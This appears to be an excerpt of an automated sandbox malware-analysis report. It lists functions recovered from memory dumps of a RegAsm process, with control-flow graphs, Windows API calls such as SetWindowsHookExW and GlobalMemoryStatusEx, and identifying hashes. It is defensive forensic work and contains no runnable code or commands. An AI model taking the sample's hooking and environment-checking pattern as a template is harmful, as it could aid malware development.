                                                              • Opcode ID: ce87d7a3b88bfb84b092b06b61d71b1aad3277c917fdd2844cec478b42b9b9bb
                                                              • Instruction ID: 90e2471ba2b4a8fb5701ba9ab20a546db46eead0a34d65f2964936add05a8079
                                                              • Opcode Fuzzy Hash: ce87d7a3b88bfb84b092b06b61d71b1aad3277c917fdd2844cec478b42b9b9bb
                                                              • Instruction Fuzzy Hash: 9D718E34E20105CFCB94CFA9C484D7AB7B2BF8A214FA58565D611E7764D731E841CBA1
                                                              Function 059523B0 Relevance: 1.8, APIs: 1, Instructions: 296COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1696 59523b0-59523da 1697 59523e1-59523f2 1696->1697 1698 59523dc-59523e0 1696->1698 1700 59523f4-59523f6 1697->1700 1701 59523f9-59523fa 1697->1701 1698->1697 1700->1701 1702 5952401-5952412 1701->1702 1703 59523fc 1701->1703 1706 5952414-5952418 1702->1706 1707 5952419-595241a 1702->1707 1704 5952457-5952458 1703->1704 1705 59523fd-5952400 1703->1705 1711 5952459-595245a 1704->1711 1705->1702 1706->1707 1709 5952421-5952452 1707->1709 1710 595241c-595241f 1707->1710 1709->1711 1712 5952454-5952456 1709->1712 1710->1709 1713 5952461-5952472 1711->1713 1714 595245c 1711->1714 1712->1704 1715 5952474-5952478 1713->1715 1716 5952479-595247a 1713->1716 1714->1713 1715->1716 1717 5952481-5952492 1716->1717 1718 595247c-595247f 1716->1718 1719 5952494-5952498 1717->1719 1720 5952499-595249a 1717->1720 1718->1717 1719->1720 1721 59524a1-59524b0 1720->1721 1722 595249c 1720->1722 1723 59524b2 1721->1723 1724 59524fe-5952506 1721->1724 1722->1721 1725 59524b4-59524b8 1723->1725 1726 59524b9-59524ba 1723->1726 1727 595250d-5952576 1724->1727 1728 5952508 1724->1728 1725->1726 1730 59524c1-59524ed 1726->1730 1731 59524bc-59524bf 1726->1731 1732 5952581-5952588 1727->1732 1733 5952578-595257e 1727->1733 1728->1727 1746 59524f0 call 5952510 1730->1746 1747 59524f0 call 59523b0 1730->1747 1731->1730 1734 5952593-5952632 CreateWindowExW 1732->1734 1735 595258a-5952590 1732->1735 1733->1732 1738 5952634-595263a 1734->1738 1739 595263b-5952673 1734->1739 1735->1734 1736 59524f5-59524f6 1738->1739 1743 5952675-5952678 1739->1743 1744 5952680 1739->1744 1743->1744 1745 5952681 1744->1745 1745->1745 1746->1736 1747->1736
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6bc1839df4327bc2b0a3d2073f3b3aa39b4f57a2da850588f7f02bf4321bb27
                                                              • Instruction ID: 5e80fb2a0ef5403dfacb5bbf13c3f25aaa42eb2a926e1fbabe0d1496d8f5793e
                                                              • Opcode Fuzzy Hash: a6bc1839df4327bc2b0a3d2073f3b3aa39b4f57a2da850588f7f02bf4321bb27
                                                              • Instruction Fuzzy Hash: DB919F75C093889FCF06CFA5C850A9DBFB5FF4A310F19819BE845AB262D3349859CB52
                                                              Function 059502F8 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1748 59502f8-5950301 1750 5950304-5950307 1748->1750 1751 5950309-5950317 1748->1751 1750->1751 1752 5950343-5950347 1751->1752 1753 5950319 1751->1753 1754 5950349-5950353 1752->1754 1755 595035b-595039c 1752->1755 1805 595031f call 59504f8 1753->1805 1806 595031f call 59502f8 1753->1806 1754->1755 1761 595039e-59503a6 1755->1761 1762 59503a9-59503b7 1755->1762 1756 5950324-5950326 1758 595033c 1756->1758 1759 5950328 1756->1759 1758->1752 1803 595032e call 5950591 1759->1803 1804 595032e call 59505a0 1759->1804 1761->1762 1763 59503b9-59503be 1762->1763 1764 59503db-59503dd 1762->1764 1766 59503c0-59503c7 1763->1766 1767 59503c9 1763->1767 1769 59503e0-59503e7 1764->1769 1765 5950334-5950336 1765->1758 1768 5950478-59504f2 1765->1768 1770 59503cb-59503d9 1766->1770 1767->1770 1796 59504f4 1768->1796 1797 59504f9-5950538 1768->1797 1771 59503f4-59503fb 1769->1771 1772 59503e9-59503f1 1769->1772 1770->1769 1773 59503fd-5950405 1771->1773 1774 5950408-5950411 1771->1774 1772->1771 1773->1774 1779 5950413-595041b 1774->1779 1780 595041e-5950423 1774->1780 1779->1780 1781 5950425-595042c 1780->1781 1782 5950441-595044e 1780->1782 1781->1782 1784 595042e-595043e 1781->1784 1788 5950471-5950477 1782->1788 1789 5950450-595046e 1782->1789 1784->1782 1789->1788 1796->1797 1798 5950540-595056b GetModuleHandleW 1797->1798 1799 595053a-595053d 1797->1799 1800 5950574-5950588 1798->1800 1801 595056d-5950573 1798->1801 1799->1798 1801->1800 1803->1765 1804->1765 1805->1756 1806->1756
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ed21c3f49efb81780c159b617f3ef13a4c496c2d88f73e38d60db7154e3248b7
                                                              • Instruction ID: c60e53c01068d919add91d35b35960c3aa7756a699a46fe9f3f7b84682ede8be
                                                              • Opcode Fuzzy Hash: ed21c3f49efb81780c159b617f3ef13a4c496c2d88f73e38d60db7154e3248b7
                                                              • Instruction Fuzzy Hash: A2815B70A04B058FD764DF6AD04476ABBF5FF48710F04892ED88ADB650E774E85ACB90
                                                              Function 05952510 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1807 5952510-5952576 1808 5952581-5952588 1807->1808 1809 5952578-595257e 1807->1809 1810 5952593-5952632 CreateWindowExW 1808->1810 1811 595258a-5952590 1808->1811 1809->1808 1813 5952634-595263a 1810->1813 1814 595263b-5952673 1810->1814 1811->1810 1813->1814 1818 5952675-5952678 1814->1818 1819 5952680 1814->1819 1818->1819 1820 5952681 1819->1820 1820->1820
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05952622
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 26903ddfcf52be56607f7772eda832af6dc9dd014831aa5e9655dc534b4eaf4f
                                                              • Instruction ID: a7ac9b151b9b5c353fac72c3e7782d163e805f125fd66c61dc6f2b73c8118bc9
                                                              • Opcode Fuzzy Hash: 26903ddfcf52be56607f7772eda832af6dc9dd014831aa5e9655dc534b4eaf4f
                                                              • Instruction Fuzzy Hash: 2941B0B5D00349DFDF14CF99C984ADEBBB5BF48310F24852AE819AB250D775A885CF90
                                                              Function 05954C70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1821 5954c70-5954cac 1822 5954cb2-5954cb7 1821->1822 1823 5954d5c-5954d7c 1821->1823 1824 5954cb9-5954cf0 1822->1824 1825 5954d0a-5954d42 CallWindowProcW 1822->1825 1830 5954d7f-5954d8c 1823->1830 1831 5954cf2-5954cf8 1824->1831 1832 5954cf9-5954d08 1824->1832 1826 5954d44-5954d4a 1825->1826 1827 5954d4b-5954d5a 1825->1827 1826->1827 1827->1830 1831->1832 1832->1830
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05954D31
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 6a0f6ffb0e8c6e9c19c9399c9e0875ff32ec85aab1e84d7809c9ecae83b4f57b
                                                              • Instruction ID: 8637d37295008b63e166a364b45307ec7d051fd8a865c06b8df5bd015df46627
                                                              • Opcode Fuzzy Hash: 6a0f6ffb0e8c6e9c19c9399c9e0875ff32ec85aab1e84d7809c9ecae83b4f57b
                                                              • Instruction Fuzzy Hash: A44108B59003098FDB54CF99C448AAABBF5FB88314F24C859D919AB321D775A845CFA0
                                                              Function 0595E41B Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0595E3D2), ref: 0595E4BF
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 5b2feb349b71b073d1161542a9595c359fd0ed0f30a65118d884dbc3ccfc71f1
                                                              • Instruction ID: c6599a189a440013a99d070fb5b1a3bd2f5cc39eb1e87ceb617a824926a2c31b
                                                              • Opcode Fuzzy Hash: 5b2feb349b71b073d1161542a9595c359fd0ed0f30a65118d884dbc3ccfc71f1
                                                              • Instruction Fuzzy Hash: 9A2157B1C042698FCB10DFA9D5447EEBBF8EF48320F1485AAD918B7350D7789985CBA1
                                                              Function 014A75F0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014A767F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 1df6fbae129148e19c4d83291c158512d2af03e8440389b484868601ce14bc37
                                                              • Instruction ID: 7a4c86ebd3df561bad0daba29b6a3bbc00ff5f144b6a3f8723d5bf62c1e34f0a
                                                              • Opcode Fuzzy Hash: 1df6fbae129148e19c4d83291c158512d2af03e8440389b484868601ce14bc37
                                                              • Instruction Fuzzy Hash: 9F21E3B5D002499FDB10CFAAD584AEEBBF4EB48320F14841AE918A7350D378A954CFA0
                                                              Function 014A75F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014A767F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: dfa5a689930750ea71f6c7d98da54b4e960ebae6516721d361bba632cf1c22da
                                                              • Instruction ID: 4ae032aa5b44443a277defc4e042357b936ef9109c980c6fc37c624ad2cad370
                                                              • Opcode Fuzzy Hash: dfa5a689930750ea71f6c7d98da54b4e960ebae6516721d361bba632cf1c22da
                                                              • Instruction Fuzzy Hash: 9D21C4B5D002489FDB10CFAAD984ADEBFF4EB48320F14841AE918A7350D379A954CFA5
                                                              Function 014A23B0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 014A2433
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: 56549a70f5190059c764f0e2fb977d913b59b8ff342ef36bf9f46f954abc2b5a
                                                              • Instruction ID: afca858a88f41e0f237416842d2bd3ae1db3e1858ab65167d1c842f8916af6e9
                                                              • Opcode Fuzzy Hash: 56549a70f5190059c764f0e2fb977d913b59b8ff342ef36bf9f46f954abc2b5a
                                                              • Instruction Fuzzy Hash: 112123B5D002098FDB14CFA9D844AEFBBF5BF88314F10842AE459A7260C778A941CFA1
                                                              Function 014A23B8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 014A2433
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: 1f7a15254755465953c145248345de75b517d2ec763b14b91b7fa115be8ea58e
                                                              • Instruction ID: 16012d647924a1cea83a3d865880b26f2dcc1f349eaf4afff6f9239138aadddf
                                                              • Opcode Fuzzy Hash: 1f7a15254755465953c145248345de75b517d2ec763b14b91b7fa115be8ea58e
                                                              • Instruction Fuzzy Hash: 2B2104B5D002098FDB14DF9AC944AEEBBF5AF88310F10842AE519A7250CB78A945CFA1
                                                              Function 0595DCF8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0595E3D2), ref: 0595E4BF
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 09bf5eb8a8dd4ae8e3c1ef34751ba10540bfa41259743b93cf0ab052ac14f2fa
                                                              • Instruction ID: ed0ce436c70a4ddf52bf7f67a87d6e24b0695b74bce24606b96d806cb982716c
                                                              • Opcode Fuzzy Hash: 09bf5eb8a8dd4ae8e3c1ef34751ba10540bfa41259743b93cf0ab052ac14f2fa
                                                              • Instruction Fuzzy Hash: 731133B1C006599BCB10DF9AC5446AEFBF8EF48320F10816AE918B7240D778A954CFE1
                                                              Function 059504F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0595055E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: c6e7cb068bb47442c405fd6b2e70d7ea9127b7ced2fa15b626110dd1540dd93a
                                                              • Instruction ID: df8d423408fa8ef57b3b0e8f94ecc89dc3553637343396208fbfa2038d6f7035
                                                              • Opcode Fuzzy Hash: c6e7cb068bb47442c405fd6b2e70d7ea9127b7ced2fa15b626110dd1540dd93a
                                                              • Instruction Fuzzy Hash: 5911DFB6C046498FDB10CF9AD448BDEFBF8EB88724F14842AD919A7210D379A545CFA1
                                                              Function 067F31D0 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              • Opcode ID: b219f97c59befcc447996f123535efb65487e9fa0dbb9ac385c153cb70c980d4
                                                              • Instruction ID: c84cb17fc128688c203b557924cc11de3dad794f1dec37d03ea5e5c92984671b
                                                              • Opcode Fuzzy Hash: b219f97c59befcc447996f123535efb65487e9fa0dbb9ac385c153cb70c980d4
                                                              • Instruction Fuzzy Hash: C2619D317241158FD744CF79C888E7A7BE9AF8962070584A9EA16CB361DB36EC40CBE1
                                                              Function 067F0AE8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d8bq
                                                              • API String ID: 0-3484500975
                                                              • Opcode ID: 96870b34944b7b1e32eb9137c2f3237d401d3f99020108ffd41fe8bd819ddb9e
                                                              • Instruction ID: 2e573faf0f7a39f274904ab695efc5c162128b26eeb1e0680a94e8ac222d796a
                                                              • Opcode Fuzzy Hash: 96870b34944b7b1e32eb9137c2f3237d401d3f99020108ffd41fe8bd819ddb9e
                                                              • Instruction Fuzzy Hash: B051F3357102048FC7659B39D828FBE7BA6EF84710F0445A9EA5ACB7A2DB74DC05CB90
                                                              Function 067F2FD0 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              • Opcode ID: f4c4907127bbeefa61004e560d7ff5ecb90601f13b0a1e3deeb18efeb98bd3ac
                                                              • Instruction ID: f321698df15c43901a0311de828a29c2d2467db7803614e17db150b757d3591b
                                                              • Opcode Fuzzy Hash: f4c4907127bbeefa61004e560d7ff5ecb90601f13b0a1e3deeb18efeb98bd3ac
                                                              • Instruction Fuzzy Hash: DF414C74620109DFDB54CF69D888E6A7BB6FF88320F004066FA168B361CB75DD40CBA1
                                                              Function 067F569C Relevance: .4, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05f5826d27c9327364f9c2c0d8184d96a653c0f93edf577c71f9864278ffc142
                                                              • Instruction ID: a572756cdd517af8c3444c9e5e80a32999455bb1131fdbc0d271c035993c16e1
                                                              • Opcode Fuzzy Hash: 05f5826d27c9327364f9c2c0d8184d96a653c0f93edf577c71f9864278ffc142
                                                              • Instruction Fuzzy Hash: E821D435B043504FDB14DB38E818B5E7FA6ABC9620F1582A9D855AB3DADA38DC418B81
                                                              Function 067F0448 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46dfec5d6a669f5ceef746af4b4b0268152fdc8079aa155d78e7a4e6f369e567
                                                              • Instruction ID: 23da7fcdce2379bd38f6d8032ddb2f45e5bde9b916280db082dbadbf1eae30d7
                                                              • Opcode Fuzzy Hash: 46dfec5d6a669f5ceef746af4b4b0268152fdc8079aa155d78e7a4e6f369e567
                                                              • Instruction Fuzzy Hash: 5D319F35A1110E9FDB459F64D864EBE7BA2FB98650F008029FA0587361CB39CD61DBA0
                                                              Function 067F3400 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bea42e4b25399b21d7b1df3949beaaf23e4c3843bc95fb38cfb4961ec337887
                                                              • Instruction ID: 6a52ff90ba87f81a5269818322994e565d76339c863b3dac9cf6ad1465d05701
                                                              • Opcode Fuzzy Hash: 6bea42e4b25399b21d7b1df3949beaaf23e4c3843bc95fb38cfb4961ec337887
                                                              • Instruction Fuzzy Hash: 4321B0307202054BEB665B398454E3E399BAFC46A8F148039D606CB394EE6BCC42D3D5
                                                              Function 067F33EF Relevance: .1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b11b7880b6cda4f3a50f9ce8fa73e20c162fea48530f4a8d9b0646df8f524d1
                                                              • Instruction ID: 68d071d6d5b1481416131ab1a2639851fa4b70195173a81216991c06dadf336f
                                                              • Opcode Fuzzy Hash: 7b11b7880b6cda4f3a50f9ce8fa73e20c162fea48530f4a8d9b0646df8f524d1
                                                              • Instruction Fuzzy Hash: 502125307302014BDB664B398899E3D3A97AFC45B8B088039D606CB3A5EE2BCC02D3D1
                                                              Function 0144D500 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3342124855.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_144d000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa9c1534a2fd6916fe9210901321735ccdd20991707d52ce8a61e1bae437bab9
                                                              • Instruction ID: 961efaffc684971673944fbe5f4acd0e6768761f3a42e13e4b2ad92607f8499d
                                                              • Opcode Fuzzy Hash: fa9c1534a2fd6916fe9210901321735ccdd20991707d52ce8a61e1bae437bab9
                                                              • Instruction Fuzzy Hash: 5B210671904204DFEB15DF58D9C0F27BF65FBA8318F24C56AD9090A326C73AD456CAE1
                                                              Function 067F0438 Relevance: .1, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa873b0050fd24729ebfff2e19aadadcb99c119321efd25ae9c48dcafd42ced7
                                                              • Instruction ID: ab1bd20267c25c80c2301b48d136eaf992167e2491d4200bb7166ebf317a903e
                                                              • Opcode Fuzzy Hash: aa873b0050fd24729ebfff2e19aadadcb99c119321efd25ae9c48dcafd42ced7
                                                              • Instruction Fuzzy Hash: F5213735A2110D8FD7548F64D425F7A3BA2FB94660F00802AFA058B352CB38CD65CBD0
                                                              Function 0145D0FC Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3342476873.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_145d000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 339900c233c4a20ae7d1eb8debc943650df323d6dcd20102b3f5247591cd9c12
                                                              • Instruction ID: 9f2a6230258297176d373f62bb0704a6f47ab6c1ae4204c691bdec7c35b80b92
                                                              • Opcode Fuzzy Hash: 339900c233c4a20ae7d1eb8debc943650df323d6dcd20102b3f5247591cd9c12
                                                              • Instruction Fuzzy Hash: CC21F271904204EFDB45DFA8D980B26BBA5EF88314F24C96EDD0A4B367C73AD446CB61
                                                              Function 067F66C8 Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6947d985f3ca964efb823538cfffe9fac9229cb26f69ec80648ccebd8204505
                                                              • Instruction ID: 6b498932e595a63b65f47e6b489398c099397a92281d154263b93e98e49a6bf2
                                                              • Opcode Fuzzy Hash: f6947d985f3ca964efb823538cfffe9fac9229cb26f69ec80648ccebd8204505
                                                              • Instruction Fuzzy Hash: 3411D030F202158FEB689F799910BBBBAE6EF80750F14852DDA8587385EB748941C7E1
                                                              Function 067F1D10 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60c1e3c1fafcd01dfeab8e83d466c9e13b65aaf8a08f1d82892965e2326213f9
                                                              • Instruction ID: 50b1fe9d954b280e59715316201cc389973444794b76c28a7f3bb85ed2ac4d0a
                                                              • Opcode Fuzzy Hash: 60c1e3c1fafcd01dfeab8e83d466c9e13b65aaf8a08f1d82892965e2326213f9
                                                              • Instruction Fuzzy Hash: B3117C31910208DFDB64CF54C844FAABBF6EF48314F94C42AE6199B211E775A944CB90
                                                              Function 0144D4FB Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3342124855.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_144d000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                                              • Instruction ID: dd14da7b372be7a08dccb071ffa55c0c35496eb6702c7d33b1f82660074d216d
                                                              • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                                              • Instruction Fuzzy Hash: BC11DF72804280CFDB12CF54D9C4B16BF61FB94314F24C5AAD9090B226C33AD45ACBA2
                                                              Function 0145D0F7 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3342476873.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_145d000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
                                                              • Instruction ID: cfefcaea413901eadb6a12a92a377073aef79b4652e56f383278ab2da5d002b7
                                                              • Opcode Fuzzy Hash: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
                                                              • Instruction Fuzzy Hash: 4411AC75904280DFDB06CF54D984B16BB61FB44214F28C6AADC494B767C33AD44ACB61
